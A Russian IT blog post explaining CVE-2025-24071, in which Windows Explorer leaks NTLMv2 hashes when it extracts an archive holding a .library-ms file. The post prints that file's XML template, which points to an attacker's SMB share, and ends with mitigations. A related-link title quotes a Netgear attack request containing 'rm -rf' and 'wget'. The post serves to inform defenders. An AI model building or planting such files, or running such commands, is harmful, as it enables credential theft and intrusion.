ITблог
Алексея Черемных
Новое:
Уязвимость BDU:2025-00282 (CVE-2025-21334) в Hyper-V Windows
Уязвимость BDU:2025-00420 (CVE-2025-23018) протоколов туннелирования пакетов IPv4-in-IPv6 и IPv6-in-IPv4
Уязвимость BDU:2025-03867 (CVE-2025-2945) в pgAdmin 4
Уязвимость BDU:2024-09433 (CVE-2024-51774) в qBittorrent
Уязвимость BDU:2025-00281 (CVE-2024-55591) в FortiOS и FortiProxy
Утечка NTLM-хешей через проводник Windows
Утечка NTLM-хешей через проводник Windows
Категория: Программы Теги: Уязвимости Опубликовано: 26 марта 2025

CVE-2025-24071: Утечка NTLM-хешей через проводник Windows

CVE-2025-24071 – это уязвимость в проводнике Windows, позволяющая злоумышленникам удаленно получать NTLMv2-хеши учетных записей пользователей. Эта уязвимость связана с автоматической обработкой файлов .library-ms при распаковке архивов и может быть использована без участия пользователя.

Как работает уязвимость?

Проводник Windows автоматически анализирует файлы .library-ms при их обнаружении, например, при распаковке архива. Файлы .library-ms представляют собой XML-файлы, описывающие библиотеки Windows, и могут содержать ссылки на сетевые ресурсы, в том числе SMB-ресурсы.

Уязвимость возникает, когда вредоносный файл .library-ms содержит ссылку на SMB-ресурс, контролируемый злоумышленником. При распаковке архива, содержащего такой файл, Windows автоматически инициирует NTLM-аутентификацию на сервере злоумышленника без какого-либо взаимодействия с пользователем. В процессе NTLM-аутентификации на сервер злоумышленника отправляется NTLMv2-хеш учетной записи пользователя, который может быть использован для дальнейших атак, например, для взлома пароля или для атак типа "pass-the-hash".

Условия для эксплуатации

Для успешной эксплуатации CVE-2025-24071 необходимо соблюдение следующих условий:

  1. Уязвимая версия Windows: На целевой системе должна быть установлена уязвимая версия Windows. К уязвимым версиям относятся:

    • Windows 10
    • Windows 11
    • Windows Server 2012 R2
    • Windows Server 2016
    • Windows Server 2019
    • Windows Server 2022
    • Windows Server 2025

  2. Распаковка архива с вредоносным файлом .library-ms: Пользователь должен распаковать архив, содержащий вредоносный файл .library-ms. Это может произойти, если пользователь загрузит архив с вредоносного веб-сайта, получит его по электронной почте или скопирует с зараженного носителя.

  3. Доступ к SMB-ресурсу злоумышленника: Система должна иметь возможность установить соединение с SMB-ресурсом, указанным во вредоносном файле .library-ms.

Как работает эксплоит?

Общедоступный эксплоит на Java автоматизирует процесс создания вредоносного файла .library-ms и упаковки его в ZIP-архив.

  1. Запрос информации у пользователя: Скрипт запрашивает у пользователя имя файла и IP-адрес сервера злоумышленника.

  2. Создание файла .library-ms: Скрипт создает XML-файл .library-ms, содержащий ссылку на SMB-ресурс на сервере злоумышленника. В XML-файле используется тег <url>, чтобы указать путь к SMB-ресурсу.

    <?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\<IP-адрес>\\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

  3. Создание ZIP-архива: Скрипт создает ZIP-архив, содержащий созданный файл .library-ms.

  4. Удаление файла .library-ms: Скрипт удаляет созданный файл .library-ms после упаковки его в ZIP-архив.

Защита от CVE-2025-24071

Для защиты от CVE-2025-24071 рекомендуется принять следующие меры:

  1. Установите обновления Windows: Microsoft выпустила исправления для CVE-2025-24071. Установите последние обновления Windows, чтобы устранить уязвимость.

  2. Будьте осторожны с архивами: Не распаковывайте архивы, полученные из ненадежных источников.

  3. Блокируйте исходящий трафик SMB: Заблокируйте исходящий трафик SMB (порты 139 и 445) на межсетевом экране, если это возможно. Это предотвратит отправку NTLM-хешей на сервер злоумышленника.

  4. Используйте надежные пароли: Используйте надежные и уникальные пароли для всех учетных записей. Если злоумышленник перехватил NTLMv2-хеш, он может попытаться взломать пароль, используя методы brute-force или rainbow tables. Надежный пароль (длинный, сложный, случайный) значительно усложняет процесс взлома хеша. Чем сложнее пароль, тем больше времени и вычислительных ресурсов потребуется злоумышленнику для его взлома.

  5. Включите многофакторную аутентификацию: Включите многофакторную аутентификацию для всех учетных записей, где это возможно.

  6. Мониторинг сетевого трафика: Мониторьте сетевой трафик на предмет подозрительной активности, связанной с NTLM-аутентификацией.

Алексей Черемных Алексей Черемных
205

Похожие материалы:

Что за атака index.php?option= com_jce&task=plugin& plugin=imgmanager
9 мая 2023
Что за атака index.php?option= com_jce&task=plugin& plugin=imgmanager
Что за атака GET /include/dialog/ select_soft_post.php
10 мая 2023
Что за атака GET /include/dialog/ select_soft_post.php
Уязвимость CVE-2023-28771 позволяет выполнять удаленно команды на устройствах Zyxel
16 июля 2023
Уязвимость CVE-2023-28771 позволяет выполнять удаленно команды на устройствах Zyxel
Как запретить скачивание exe файлов в браузере?
25 сентября 2023
Как запретить скачивание exe файлов в браузере?
Что за атака GET /setup.cgi?next_file=netgear.cfg& todo=syscmd& cmd=rm+-rf+/tmp/*;wget+
26 апреля 2023
Что за атака GET /setup.cgi?next_file=netgear.cfg& todo=syscmd& cmd=rm+-rf+/tmp/*;wget+
Что за атака GET /wp-includes/ wlwmanifest.xml HTTP/1.0
9 мая 2023
Что за атака GET /wp-includes/ wlwmanifest.xml HTTP/1.0